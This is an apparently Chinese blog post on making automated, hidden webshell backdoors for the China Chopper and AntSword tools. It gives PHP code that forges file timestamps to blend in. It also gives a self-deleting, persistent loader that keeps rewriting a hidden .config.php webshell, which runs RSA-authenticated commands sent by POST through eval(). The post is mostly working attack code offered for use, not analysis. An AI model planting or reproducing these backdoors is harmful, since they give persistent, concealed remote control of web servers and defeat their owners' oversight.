制作自动化隐藏后门菜刀蚁剑

作者:小俊 分类: XISE菜刀下载 发布于:2021-3-21 11:04 ė447次浏览 60条评论

自动化隐蔽后门实现:

这里我只是说下自己比较常用的一些点,我比较喜欢修改文件时间,然后写个比较常规的名字,然后用隐藏文件。

1 修改文件时间代码

<?php // var_dump()); try { $file = scandir($_SERVER['DOCUMENT_ROOT']); foreach ($file as $name) { if(@filectime($name)){ //change time var_dump(filectime($name)); var_dump($name); var_dump(@filectime(__FILE__)); touch(__FILE__,filectime($name)); touch($name,@filectime(__FILE__)); var_dump(@filectime(__FILE__)); break; } } } catch (Exception $e) { echo "config is wrong!"; } 

 

2 利用内存木马自动部署

<?php set_time_limit(0); ignore_user_abort(1); unlink(__FILE__); $shell = '<?php $pk = <<<EOF -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC9BPAAA3EgNhVX9x5kjXwwbrA AJSSl46CsjcloOjytsQZoR/Tn0QxI/sCaHJ23/DLviDbhZbYh3aJjXDLrGJXnQvx BUj1a/YZDq/ZqlibffV54ljOhh6A/IIk6KmXXZBETA9GxI32vqDfqvbnuzyZMWvT ShEmTzwYh4qW53cN+wIDAQAB -----END PUBLIC KEY----- EOF; $cmds = explode("|", reset(get_defined_vars()[@_POST])); $pk = openssl_pkey_get_public($pk); $cmd = ""; foreach ($cmds as $value) {  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {  $cmd .= $de;  } } eval($cmd);'; while(1){ if(file_exists(".config.php")){ try { system('chmod 777 .config.php'); $file = scandir($_SERVER['DOCUMENT_ROOT']); foreach ($file as $name) { if(@filectime($name)){ touch(".config.php", @filectime($name)); break; } } } catch (Exception $e) { echo "config is wrong!"; } }else{ //sleep some time sleep(3600*60); file_put_contents('.config.php',$shell); } } 

本文出自 小俊博客,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部